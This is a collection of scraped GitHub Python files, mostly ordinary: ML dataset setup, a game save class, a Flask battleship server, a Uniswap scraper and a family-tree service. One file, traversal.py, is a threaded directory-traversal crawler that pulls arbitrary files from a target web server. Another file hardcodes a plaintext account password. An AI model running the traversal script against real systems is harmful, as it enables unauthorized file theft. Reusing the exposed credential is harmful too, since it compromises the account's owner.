generate_metadata_civilcomments(data_path):\n logging.info(\"Generating metadata for civilcomments\")\n df = pd.read_csv(\n os.path.join(data_path, \"civilcomments\", \"all_data_with_identities.csv\"),\n index_col=0,\n )\n\n group_attrs = [\n \"male\",\n \"female\",\n \"LGBTQ\",\n \"christian\",\n \"muslim\",\n \"other_religions\",\n \"black\",\n \"white\",\n ]\n cols_to_keep = [\"comment_text\", \"split\", \"toxicity\"]\n df = df[cols_to_keep + group_attrs]\n df = df.rename(columns={\"toxicity\": \"y\"})\n df[\"y\"] = (df[\"y\"] >= 0.5).astype(int)\n df[group_attrs] = (df[group_attrs] >= 0.5).astype(int)\n df[\"no active attributes\"] = 0\n df.loc[(df[group_attrs].sum(axis=1)) == 0, \"no active attributes\"] = 1\n\n few_groups, all_groups = [], []\n train_df = df.groupby(\"split\").get_group(\"train\")\n split_df = train_df.rename(columns={\"no active attributes\": \"a\"})\n few_groups.append(split_df[[\"y\", \"split\", \"comment_text\", \"a\"]])\n\n for split, split_df in df.groupby(\"split\"):\n for i, attr in enumerate(group_attrs):\n test_df = split_df.loc[\n split_df[attr] == 1, [\"y\", \"split\", \"comment_text\"]\n ].copy()\n test_df[\"a\"] = i\n all_groups.append(test_df)\n if split != \"train\":\n few_groups.append(test_df)\n\n few_groups = pd.concat(few_groups).reset_index(drop=True)\n all_groups = pd.concat(all_groups).reset_index(drop=True)\n\n for name, df in {\"coarse\": few_groups, \"fine\": all_groups}.items():\n df.index.name = \"filename\"\n df = df.reset_index()\n df[\"id\"] = df[\"filename\"]\n df[\"split\"] = df[\"split\"].replace({\"train\": 0, \"val\": 1, \"test\": 2})\n text = df.pop(\"comment_text\")\n\n df[[\"id\", \"filename\", \"split\", \"y\", \"a\"]].to_csv(\n os.path.join(data_path, f\"metadata_civilcomments_{name}.csv\"), index=False\n )\n text.to_csv(\n os.path.join(data_path, \"civilcomments\", f\"civilcomments_{name}.csv\"),\n index=False,\n )\n\n\ndef generate_metadata_multinli(data_path):\n logging.info(\"Generating metadata for multinli\")\n df = pd.read_csv(\n os.path.join(data_path, \"multinli\", \"data\", \"metadata_random.csv\"), index_col=0\n )\n\n df = df.rename(columns={\"gold_label\": \"y\", \"sentence2_has_negation\": \"a\"})\n df = df.reset_index(drop=True)\n df.index.name = \"id\"\n df = df.reset_index()\n df[\"filename\"] = df[\"id\"]\n df = df.reset_index()[[\"id\", \"filename\", \"split\", \"y\", \"a\"]]\n df.to_csv(os.path.join(data_path, \"metadata_multinli.csv\"), index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Initialize repo with datasets\")\n parser.add_argument(\n \"datasets\",\n nargs=\"+\",\n default=['celeba', 'waterbirds', 'civilcomments', 'multinli'],\n type=str,\n help=\"Which datasets to download and/or generate metadata for\",\n )\n parser.add_argument(\n \"--data_path\",\n default=\"data\",\n type=str,\n help=\"Root directory to store datasets\",\n )\n parser.add_argument(\n \"--download\",\n action=\"store_true\",\n default=False,\n )\n args = parser.parse_args()\n\n if args.download:\n download_datasets(args.data_path, args.datasets)\n generate_metadata(args.data_path, args.datasets)\n","repo_name":"facebookresearch/BalancingGroups","sub_path":"setup_datasets.py","file_name":"setup_datasets.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"75034097066","text":"\"\"\"\"The class Save_Load for player to save the game and load a game.\"\"\"\n\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter.messagebox import showinfo\nimport os\n\nclass Save_Load():\n\tdef __init__(self,menu):\n\t\tself._Load_game=False\n\t\tself._menu=menu\n\t\tself.status=None\n\t\tself.master=''\n\t\tself.action_time=(1,1)\n\t\tself.path='memory/'\n\t\tself.files=[os.path.splitext(x)[0] for x in os.listdir(self.path) if os.path.splitext(x)[1]=='.txt']\n\n\tdef save_game(self):\n\t\tself.top=tk.Toplevel()\n\t\tself.top.title(\"save the game\")\n\t\tself.top.attributes(\"-topmost\", 1)\n\t\ttk.Label(self.top,text=\"name\",width=10).grid(row=0,column=0,sticky=\"E\")\n\t\tself.name=tk.StringVar()\n\t\ttk.Entry(self.top,textvariable=self.name,width=20).grid(row=0,column=1)\n\t\ttk.Button(self.top,text='Confirm',command=self.save_txt).grid(row=1,column=0)\n\t\ttk.Button(self.top,text='Cancel',command=self.cancel_save).grid(row=1,column=1)\n\n\tdef save_txt(self):\n\t\ttxt_name=self.name.get()\n\t\tprint(self.files)\n\t\tif txt_name in self.files:\n\t\t\tres=tk.messagebox.askyesno(\"reminder\",\"A file already exists with that name. \")\n\t\t\tif not res:\n\t\t\t\treturn \"\"\n\t\ttxt_name=self.name.get()\n\t\tself.top.destroy()\n\t\ttxt_path=os.path.join(self.path,txt_name+'.txt')\n\t\twith open(txt_path,'w') as f:\n\t\t\tf.write('%s\\n%s\\n%s\\n%s\\n'%(self._move,self._score,self._companion.get_name(),self.count))\n\t\t\tfor dot,count in self._objectives_status:\n\t\t\t\tf.write(\"%s:%s,\"%(dot.get_view_id(),str(count)))\n\t\t\tf.write('\\n')\n\t\t\tfor position,cell in self._grid.items():\n\t\t\t\tif cell.get_dot():\n\t\t\t\t\tf.write(\"%s:%s;\"%(str(position),cell.get_dot().get_view_id()))\n\t\t\tf.write('\\n')\n\t\t\tf.write(\"{},{},{}\".format(self.action_time[0],self.action_time[1],self.action_time[2]))\n\n\tdef read_txt(self,txt_path):\n\t\twith open(txt_path,'r') as f:\n\t\t\tlines_list=f.read().split('\\n')\n\t\tself._move=int(lines_list[0])\n\t\tself._score=int(lines_list[1])\n\t\tself._companion=lines_list[2]\n\t\tself.count=int(lines_list[3])\n\t\tself._objectives_count=[int(x.split(':')[1]) for x in lines_list[4].split(',') if len(x)>0]\n\t\tself.grid_list=[[item.split(':')[0],item.split(':')[1]] for item in lines_list[5].split(';') if len(item)>0]\n\t\tself.action_time=[int(i) for i in lines_list[6].split(',')]\n\n\n\tdef cancel_save(self):\n\t\tself.top.destroy()\n\n\tdef load_game(self):\n\t\ttxt_path=filedialog.askopenfilename(title=u\"选择文件\",initialdir=os.path.abspath(self.path),filetypes=[(\"Txt Files\",\".txt\")])\n\t\tif txt_path:\n\t\t\tself.read_txt(txt_path)\n\t\t\tself._Load_game=True\n\t\t\tself._menu.refresh_companion(self._companion)\n\t\t\tself._menu.new_game(self.action_time)\n\t\t\tself._Load_game=False\n\n\tdef get_status(self,move,score,companion,objectives,grid,count_len=0):\n\t\tself._move=str(move)\n\t\tself._score=str(score)\n\t\tself._companion=companion\n\t\tself._objectives_status=objectives\n\t\tself._grid=grid\n\t\tself.count=count_len\n\n\tdef get_actionbar_time(self,action_time=(1,1)):\n\t\tself.action_time=action_time\n\n\n","repo_name":"leepard1130/Python-Project","sub_path":"assignment3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30981540671","text":"# Import necessary modules\nimport os\nimport sys\nimport requests\nfrom panoptes_client import Panoptes, Project, SubjectSet, Subject\nfrom package.apis.loaders.google_cloud_platform.gcp_request import process_files\n\n# Connect to the Zooniverse Panoptes API\nPanoptes.connect(username=\"carrowmw\", password=\"2VcqEhRjFKN73Tp\")\n\n# Get the current working directory\nroot = os.getcwd()\nprint(root)\n\n# Append the path of the 'package' folder to the system path\nsys.path.append(os.path.join(root, \"\\package\"))\n\n# Check if a project with the specified display name already exists\nprojects = list(\n Project.where(display_name=\"Learning from Earthquakes (Image Labelling)\")\n)\nif len(projects) > 0:\n # If yes, use the existing project\n learning_from_earthquakes = projects[0]\nelse:\n # Otherwise, create a new project\n learning_from_earthquakes = Project()\n learning_from_earthquakes.display_name = (\n \"Learning from Earthquakes (Image Labelling)\"\n )\n learning_from_earthquakes.description = (\n \"A project for labelling earthquakes so we can learn from them\"\n )\n learning_from_earthquakes.primary_language = \"en\"\n learning_from_earthquakes.private = True\n learning_from_earthquakes.save()\n\n# Check if a subject set with the specified name already exists\nsubject_sets = list(SubjectSet.where(display_name=\"Earthquake images subject set\"))\n\nif len(subject_sets) > 0:\n # If yes, use the existing subject set\n subject_set = subject_sets[0]\nelse:\n # Otherwise, create a new subject set\n subject_set = SubjectSet()\n subject_set.links.project = learning_from_earthquakes\n subject_set.display_name = \"Earthquake images subject set\"\n subject_set.save()\n\n# Reload the project to update it with the newly saved subject set\nlearning_from_earthquakes.reload()\n\n# Print the linked subject sets of the project\nprint(learning_from_earthquakes.links.subject_sets)\n\n# Fetch the data from Google Cloud Platform (GCP) and store it in a DataFrame\ndf = process_files(bucket_name=\"photos_for_zooniverse\")\n\n# Convert the DataFrame to dictionary format suitable for Panoptes subjects\nsubject_metadata = df.to_dict(orient=\"records\")\n\n# Fetch the list of subjects for the project\nsubjects = list(Subject.where(project_id=learning_from_earthquakes.id))\n\n# Create a list containing filenames of already uploaded subjects\nuploaded_files = [subject.metadata[\"#filename\"] for subject in subjects]\n\nnew_subjects = []\n\n# Loop through the metadata to create new subjects\nfor i, record in enumerate(subject_metadata):\n url = record[\"File URL\"]\n metadata = record[\"File Name\"]\n print(f\"Processing: {i+1}/{len(subject_metadata)}\")\n\n # Skip already uploaded files\n if metadata in uploaded_files:\n print(f\"File {metadata} already uploaded. Skipping.\")\n continue\n\n # Download the image file locally\n response = requests.get(url)\n local_filename = metadata + \".jpg\"\n with open(local_filename, \"wb\") as f:\n f.write(response.content)\n\n # Create a new subject\n subject = Subject()\n subject.links.project = learning_from_earthquakes\n subject.add_location(local_filename)\n\n # Add 'File Name' and 'File URL' to metadata\n subject.metadata.update(\n {\"#filename\": metadata, \"File Name\": metadata, \"File URL\": url}\n )\n\n subject.save()\n\n # Delete the local file after upload\n os.remove(local_filename)\n\n new_subjects.append(subject)\n\n# Add new subjects to the subject set\nif len(new_subjects) > 0:\n subject_set.add(new_subjects)\n print(\"New subjects added to the subject set.\")\n print(\"Processing completed.\")\nelse:\n print(\"No new subjects added\")\n","repo_name":"alekszaf/EarthquakeMetadata","sub_path":"package/apis/subject_uploader.py","file_name":"subject_uploader.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27410019440","text":"from flask import Flask\n\nimport requests\n\napp = Flask(__name__)\n\nclient_id = 5000\n\nport_player1 = 5000\nport_player2 = 5000\n\nplayer1_score = 0\nplayer2_score = 0\n\nnum = 0\n\ntable_player1 = [[0 for i in range(10)] for j in range(10)]\n\ntable_player2 = [[0 for i in range(10)] for j in range(10)]\n\n\ndef string_to_table(s):\n\ttable_res = [[0 for i in range(10)] for j in range(10)]\n\tfor i in range(10):\n\t\tfor j in range(10):\n\t\t\ttable_res[i][j] = int(s[i*10 + j])\n\treturn table_res\n\n\n@app.route('/table/')\ndef table(arg):\n\tport = arg[100:]\n\tprint(port)\n\tglobal table_player2\n\tglobal table_player1\n\tif port == str(port_player2):\n\t\ttable_player2 = string_to_table(arg)\n\t\tprint(\"table of player2\")\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\tprint(table_player2[i][j], end=' ')\n\t\t\tprint()\n\telse:\n\t\ttable_player1 = string_to_table(arg)\n\t\tprint(\"table of player1\")\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\tprint(table_player1[i][j], end=' ')\n\t\t\tprint()\n\treturn 'ok'\n\n\n@app.route('/attack/')\ndef attack(arg):\n\tport = arg[2:]\n\tprint(port)\n\tglobal player1_score\n\tglobal player2_score\n\tif port == str(port_player2):\n\t\tprint(\"player2 attacks\", arg[0], arg[1])\n\t\tif table_player1[int(arg[1])][int(arg[0])] == 1:\n\t\t\tsend_attack(port_player1, int(arg[0]), int(arg[1]), 'y')\n\t\t\tplayer2_score += 1\n\t\t\tif player2_score == 20:\n\t\t\t\tprint(\"player1 wins\")\n\t\t\treturn 'y'\n\t\telse:\n\t\t\tsend_attack(port_player1, int(arg[0]), int(arg[1]), 'n')\n\t\t\treturn 'n'\n\telse:\n\t\tprint(\"player1 attacks\", arg[0], arg[1])\n\t\tif table_player2[int(arg[1])][int(arg[0])] == 1:\n\t\t\tsend_attack(port_player2, int(arg[0]), int(arg[1]), 'y')\n\t\t\tplayer1_score += 1\n\t\t\tif player1_score == 20:\n\t\t\t\tprint(\"player1 wins\")\n\t\t\treturn 'y'\n\t\telse:\n\t\t\tsend_attack(port_player2, int(arg[0]), int(arg[1]), 'n')\n\t\t\treturn 'n'\n\n\n@app.route('/connect')\ndef connect():\n\tglobal client_id\n\tglobal port_player1\n\tglobal port_player2\n\tglobal num\n\tclient_id += 1\n\tres = str(client_id)\n\tprint(\"Client %d connected\" % client_id)\n\tif num == 0:\n\t\tport_player1 = client_id\n\t\tnum = 1\n\t\tres = 'player1' + res\n\t\treturn res\n\telse:\n\t\tport_player2 = client_id\n\t\tnum = 0\n\t\tres = 'player2' + res\n\t\treturn res\n\n\ndef send_attack(port, x, y, r):\n\targ = str(x) + str(y) + str(r)\n\tid = 'http://localhost:' + str(port) + '/enemy_attack/' + str(arg)\n\treq = requests.get(id)\n\n\ndef send(arg, clid):\n\tid = 'http://localhost:' + str(clid) + '/index/' + str(arg)\n\treq = requests.get(id)\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"inigomontoya722/battle_ship_game","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3345594328","text":"from radmc3dPy import image\nimport argparse\n\nto_fits = argparse.ArgumentParser()\nto_fits.add_argument(\n 'input',\n help='the input radmc3d image file (typically image.out)'\n)\n\nto_fits.add_argument(\n '-o', metavar='FILE', dest='output',\n help='output fits file [default: .fits]'\n)\n\nto_fits.add_argument(\n '--dist', metavar='DISTANCE_PC',\n help='distance to source in pc [default 140]',\n type=float, default=140.0\n)\n\nto_fits.add_argument(\n '--ra', metavar='__h__m__s',\n help='right ascension [default 15h48m05s]',\n type=str, default='15h48m05s'\n)\n\nto_fits.add_argument(\n '--dec', metavar='__d__m__s',\n help='declination [default 24d00m00s]',\n type=str, default='24d00m00s'\n)\n\nto_fits.add_argument(\n '--bandwidth', metavar='BANDWIDTH_MHZ',\n help='bandwidth in MHz (ignored for multi-frequency) [default 2000]',\n type=float, default=2000.0\n)\n\nif __name__ == '__main__':\n args = to_fits.parse_args()\n im = image.readImage(args.input)\n output = args.output if args.output is not None else args.input + '.fits'\n im.writeFits(\n output, dpc=args.dist, bandwidthmhz=args.bandwidth,\n coord=f'{args.ra} {args.dec}'\n )\n\n if args.output is None:\n print(f'Output fits file written to {output}')\n","repo_name":"benburrill/radmc3d_image_setup","sub_path":"to_fits.py","file_name":"to_fits.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11695884168","text":"import os\nimport requests\n\nURL = \"https://api.thegraph.com/subgraphs/name/uniswap/uniswap-v2\"\nUNISWAPV2_FILE = os.path.join(os.path.dirname(__file__), \"../data/uniswap_v2_addr_list.csv\")\n\n\ndef get_query(query):\n r = requests.post(URL, json={'query': query})\n if r.status_code == 200:\n return r.json()\n else:\n raise Exception('Query failed and return code is {}. {}'.format(r.status_code, query))\n\n\ndef main():\n\n raw_query = \"\"\"query MyQuery {\n pairs(first:LIMIT, orderBy: createdAtTimestamp, orderDirection: asc, where: {createdAtTimestamp_gt: TIMESTAMP}) {\n id\n reserve0\n token0Price\n token0 {\n id\n name\n symbol\n decimals\n }\n reserve1\n token1Price\n token1 {\n id\n name\n symbol\n decimals\n }\n createdAtBlockNumber\n createdAtTimestamp\n }\n}\n \"\"\"\n if not os.path.exists(UNISWAPV2_FILE):\n with open(UNISWAPV2_FILE, \"w\") as f:\n columns = ['address', 'token0_address', 'token0_name', 'token0_symbol', 'token0_decimals', 'reserve0', 'token0_price', 'token1_address', 'token1_name', 'token1_symbol', 'token1_decimals', 'reserve1', 'token1_price', 'createdAtBlockNumber', 'createdAtTimestamp']\n f.write(\",\".join(columns) + \"\\n\")\n max_createdAtTimestamp = 0\n else:\n with open(UNISWAPV2_FILE, \"r\") as f:\n lines = f.readlines()\n line = lines[-1].strip()\n \n max_createdAtTimestamp = int(line.split(\",\")[-1])\n print(\"max_createdAtTimestamp: \", max_createdAtTimestamp)\n\n LIMIT = 1000\n\n while True:\n query = raw_query.replace(\"LIMIT\", str(LIMIT)).replace(\"TIMESTAMP\", str(max_createdAtTimestamp))\n result = get_query(query)\n\n while \"data\" not in result or \"pairs\" not in result[\"data\"]:\n result = get_query(query)\n\n for pair in result[\"data\"][\"pairs\"]:\n pair_address = pair[\"id\"]\n\n token0 = pair[\"token0\"]\n token0_address = token0[\"id\"]\n token0_name = token0[\"name\"].strip().replace(\",\", \"(comma)\")\n token0_symbol = token0[\"symbol\"].strip().replace(\",\", \"(comma)\")\n token0_decimals = token0[\"decimals\"]\n token0_price = pair[\"token0Price\"]\n reserve0 = pair[\"reserve0\"]\n\n token1 = pair[\"token1\"]\n token1_address = token1[\"id\"]\n token1_name = token1[\"name\"]\n token1_name = token1_name.strip().replace(\",\", \"(comma)\")\n token1_symbol = token1[\"symbol\"].strip().replace(\",\", \"(comma)\")\n token1_decimals = token1[\"decimals\"]\n token1_price = pair[\"token1Price\"]\n reserve1 = pair[\"reserve1\"]\n\n createdAtBlockNumber = pair[\"createdAtBlockNumber\"]\n createdAtTimestamp = pair[\"createdAtTimestamp\"]\n\n max_createdAtTimestamp = max(max_createdAtTimestamp, int(createdAtTimestamp))\n\n with open(UNISWAPV2_FILE, \"a\") as f:\n f.write(\",\".join([pair_address, token0_address, token0_name, token0_symbol, str(token0_decimals), str(reserve0), str(token0_price), token1_address, token1_name, token1_symbol, str(token1_decimals), str(reserve1), str(token1_price), str(createdAtBlockNumber), str(createdAtTimestamp)]) + \"\\n\")\n\n print(\"max_createdAtTimestamp: \", max_createdAtTimestamp)\n\n if len(result[\"data\"][\"pairs\"]) < LIMIT:\n break\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pillowsofwind/mev","sub_path":"collections/uniswap_v2_collect_thegraph.py","file_name":"uniswap_v2_collect_thegraph.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70345615147","text":"import time\nfrom tqdm import tqdm\n\n\nclass ReplayStub:\n def __init__(self, duration):\n self.duration = duration\n\n\ndef test_progressbar():\n replay = ReplayStub(10)\n for _ in tqdm(\n range(int(round(replay.duration + 5, 0))),\n desc=f'Watching replay for {replay.duration} seconds'\n ):\n time.sleep(1)\n\n\nif __name__ == '__main__':\n test_progressbar()\n","repo_name":"care1e55/pyautoreplay","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29781149593","text":"\"\"\"\nWrite a function that takes a string as input and reverse only \nthe vowels of a string.\n\nExample 1:\n\nInput: \"hello\"\nOutput: \"holle\"\n\"\"\"\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n words = list(s)\n vowel = set(list(\"aeiouAEIOU\"))\n start, end = 0, len(s) - 1\n while start < end:\n if words[start] not in vowel:\n start += 1\n elif words[end] not in vowel:\n end -= 1\n else:\n words[start], words[end] = words[end], words[start]\n start += 1\n end -= 1\n\n return ''.join(words)\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13642844233","text":"import urllib2\nimport threading\nimport sys\nimport os\n\nhistory = []\n\ndef Crawl(dict,target,folder):\n\tglobal history\n\tfor uri in dict.readlines():\n\t\turi = uri.replace(\"\\n\",\"\").replace(\" \",\"\").replace(\"\\r\",\"\").replace(\"//\",\"\\\\\")\n\t\tif len(uri) > 1:\n\t\t\tif uri not in history:\n\t\t\t\thistory.append(uri)\n\t\t\t\turl = target + uri\n\t\t\t\ttry:\n\t\t\t\t\tres = urllib2.urlopen(url,timeout = 10)\n\t\t\t\t\thtmlSource = res.read()\n\t\t\t\t\tprint(\"Crawl PATH {}\".format(url))\n\t\t\t\t\tfile = open(folder + \"/\" + uri.split(\"/\")[-1],'w')\n\t\t\t\t\tfile.write(\"-----------\" + url + \"-----------\\n\")\n\t\t\t\t\tfile.write(htmlSource)\n\t\t\t\t\tfile.close()\n\t\t\t\t\tres.close()\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\nif __name__ == \"__main__\":\n\t\n\tif not os.path.exists(sys.argv[1]):\n\t\tos.mkdir(sys.argv[1])\n\t\t\n\tdict = file(sys.argv[2],'r')\n\tlist_thread = []\n\twhile True:\n\t\tif len(list_thread) < int(sys.argv[3]):\n\t\t\tthread = threading.Thread(target=Crawl, args=(dict,sys.argv[4],sys.argv[1],)) \n\t\t\tlist_thread.append(thread)\n\t\telse:\n\t\t\tbreak\n\n\tfor i in list_thread:\n\t\ti.start()\n\t\t\n\tfor i in list_thread:\n\t\ti.join()\n\n\t\t\n\n","repo_name":"sonpd2/Hacking-Knowledge","sub_path":"Exploits/Web Server Directory Traversal Arbitrary File Access/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15727368335","text":"import re\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport datetime\nimport time\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\ndef date_to_unix_time(date):\n if date is None or date == '':\n return None\n dt = datetime.datetime.strptime(date, '%B %d, %Y')\n return int(time.mktime(dt.timetuple()))\n\n\ndef get_n_grams(_text, _n, _gram_dict={}):\n # if a special character is being used as punctuation (not in a name) add a space\n _text = re.sub('(: )', ' \\\\g<1>', _text)\n _text = re.sub('(- )', ' \\\\g<1>', _text)\n _text = re.sub('(, )', ' \\\\g<1>', _text)\n _text = re.sub('(\\\\. )', ' \\\\g<1>', _text)\n _text = re.sub('(- )', ' \\\\g<1>', _text)\n _text = re.sub('(\\\\? )', ' \\\\g<1>', _text)\n _text = re.sub('(; )', ' \\\\g<1>', _text)\n _text = re.sub('(! )', ' \\\\g<1>', _text)\n # remove paranthesis arounda single word\n _text = re.sub(' \\\\(([^ ])\\\\) ', ' \\\\g<1> ', _text)\n # remove leading and trailing parenthesis\n _text = re.sub(' \\\\(', ' ', _text)\n _text = re.sub('\\\\) ', ' ', _text)\n _text_list = _text.split(' ')\n\n # create the n-grams\n _done = False\n # gram_dict = {}\n for _i in range(len(_text_list)):\n _gram = ''\n _skip = False\n for _j in range(_n):\n if _i + _j >= len(_text_list):\n _done = True\n break\n # check if the current item is punctuation, if so skip this gram\n if _text_list[_i + _j] in ['.', ',', '?', ';', '!', ':', '-']:\n _skip = True\n break\n _gram += _text_list[_i + _j] + ' '\n if not _done and not _skip:\n # remove trailing space\n _gram = _gram[:-1]\n # if gram has already been made\n if _gram in _gram_dict:\n # increment count\n _gram_dict[_gram] += 1\n else:\n # else create new entry\n _gram_dict[_gram] = 1\n _gram_df = pd.DataFrame({'gram': list(_gram_dict.keys()), 'count': list(_gram_dict.values())})\n return _gram_df, _gram_dict\n\n\ndef get_df_of_n_grams(_texts, _n):\n _dic = {}\n _final_df = None\n for _ab in _texts:\n _final_df, _dic = get_n_grams(BeautifulSoup(_ab).get_text(), _n, _dic)\n\n _grams = list(set(_final_df['gram']))\n _article_n_grams = {_x: [] for _x in _grams}\n\n for _ab in _texts:\n _final_df, _dic = get_n_grams(BeautifulSoup(_ab).get_text(), _n,{})\n for _key in _grams:\n if _key in _dic:\n _article_n_grams[_key].append(_dic[_key])\n else:\n _article_n_grams[_key].append(0)\n\n fake_df_n_grams = pd.DataFrame(_article_n_grams)\n return fake_df_n_grams\n\ndf = pd.read_csv('dataset.csv')\n\ndf_copy = df\n\ngrams_2 = get_df_of_n_grams(list(df['abstract']),2)\n\n\n\npca = PCA(n_components=2)\npca.fit(grams_2.to_numpy())\n\nloadings = pd.DataFrame(pca.components_.T, columns=['PC1', 'PC2'], index=list(grams_2.columns))\nsorted_loadings = loadings.sort_values(['PC1', 'PC2'],ascending=False)\n# top 10 most important 2-grams\nprint(sorted_loadings.iloc[:10,:])\nsorted_loadings.iloc[:10,:].to_csv('top-10-pca-term.csv')\n# bottom 10 2-grams\nprint(sorted_loadings.iloc[-10:,:])\nsorted_loadings.iloc[-10:,:].to_csv('bottom-10-pca-term.csv')\n\npca2 = PCA(n_components=2)\npca2.fit(grams_2.to_numpy().transpose())\n\npickle.dump(pca2, open('real_fake_pca.pickle','wb'))\n\nsns.scatterplot(pca2.components_[0,:],pca2.components_[1,:],hue=list(df['type']))\nplt.savefig('real_vs_fake_pca.png')\n\npca = pickle.load(open('real_fake_pca.pickle','rb'))\n\nfakes0 = list(pca.components_[0][:list(df['type']).index('real')])\nfakes1 = list(pca.components_[1][:list(df['type']).index('real')])\n\nreal0 = list(pca.components_[0][list(df['type']).index('real'):])\nreal1 = list(pca.components_[1][list(df['type']).index('real'):])\n\npc_1 = real0 + fakes0\npc_2 = real1 + fakes1\n\nlabels = (['real'] * len(real0)) + (['fake'] * len(fakes0))\n\nsns.scatterplot(pc_1,pc_2,hue=labels)\n","repo_name":"MSBradshaw/BioHackathon2020","sub_path":"real_fake_ngram.py","file_name":"real_fake_ngram.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395515192","text":"import traceback\n\nfrom family_system import constants\nfrom family_system.models.person import Person\nfrom family_system.services.base_service import BaseService\n\n\nclass PersonService(BaseService):\n @classmethod\n def initialize_person(cls, name, sex):\n try:\n person_obj = Person(name, sex)\n return person_obj\n except Exception as e:\n print(\"Exception in initializing the king and queen \", name, sex, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_generation(cls, person, generation):\n try:\n if person is None:\n print(\"set_generation - Person doesn't exist\")\n return\n if generation < 1:\n print(\"Wrong generation \", generation)\n return\n person.set_generation(generation)\n except Exception as e:\n print(\"Exception in settig the generation for person \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_spouse(cls, person , spouse):\n try:\n if person is None or spouse is None:\n print(\"set_spouse - Either person or its spouse is None\", person, spouse)\n return\n if person.spouse is not None:\n print(\"set_spouse - person \", person.name, \"spouse already exists -- \", person.spouse.name)\n return\n if spouse.spouse is not None and spouse.spouse != person:\n print(\"set_spouse - Some other person mentioned as spouse's spouse\", spouse.spouse)\n return\n person.set_spouse(spouse)\n spouse.set_spouse(person)\n except Exception as e:\n print(\"Exception in setting the spouse for \", person, spouse, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def set_is_part_of_shan(cls, person, is_part):\n try:\n if person is None:\n print(\"set_is_part_of_shan - Person doesn't exist\")\n return\n person.set_is_part_of_shan(is_part)\n except Exception as e:\n print(\"Exception in setting is part of shan \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_son(cls, person, son_obj):\n try:\n if person is None:\n print(\"add_son - Person doesn't exist\")\n return\n if son_obj is None or son_obj.sex != constants.MALE:\n print(\"Son is None or not correct\")\n return\n\n person.set_son(son_obj)\n except Exception as e:\n print(\"Exception in adding son \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_daughter(cls, person, daughter_obj):\n try:\n if person is None:\n print(\"add_daughter - Person doesn't exist\")\n return\n if daughter_obj is None or daughter_obj.sex != constants.FEMALE:\n print(\"Daughter is None or not correct\")\n return\n person.set_daughter(daughter_obj)\n except Exception as e:\n print(\"Exception in adding daughter \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_mother(cls, person, mother_obj):\n try:\n if person is None:\n print(\"add_mother - Person doesn't exist\")\n return\n if mother_obj is None or mother_obj.sex != constants.FEMALE:\n print(\"Mother is None or not correct\")\n return\n person.set_mother(mother_obj)\n if person.sex == constants.MALE:\n cls.add_son(mother_obj, )\n except Exception as e:\n print(\"Exception in adding mother \", person, traceback.print_exc(), e)\n raise e\n\n @classmethod\n def add_father(cls, person, father_obj):\n try:\n if person is None:\n print(\"add_father - Person doesn't exist\")\n return\n if father_obj is None or father_obj.sex != constants.FEMALE:\n print(\"Father is None or not correct\")\n return\n person.set_father(father_obj)\n except Exception as e:\n print(\"Exception in adding father \", person, traceback.print_exc(), e)\n raise e\n","repo_name":"snehilrastogi/low_level_design","sub_path":"geektrust_family_problem/family_system/services/person_service.py","file_name":"person_service.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11098375916","text":"#!/usr/bin/env python\n\n\"\"\"\ndistutils setup (setup.py).\n\nThis is just boilerplate code, since we do like to try to keep data separate\nfrom code as much as possible. The customizable information really comes\nfrom file __pkginfo__.py.\n\"\"\"\n\nimport os, sys\n\nif not ((2, 4) <= sys.version_info[0:2] < (3, 0)):\n mess = \"Only Python Versions 2.4 to 2.7 are supported in this package.\"\n if (3, 2) <= sys.version_info[0:2] < (3, 7):\n mess += \"\\nFor your Python, version %s, see trepan3k\" % sys.version[0:3]\n elif sys.version_info[0:2] < (2, 6):\n mess += \"\\nFor your Python, version %s, see pydbgr\" % sys.version[0:3]\n raise Exception(mess)\nelif ((2, 4) <= sys.version_info[0:2] < (2, 6)) and not 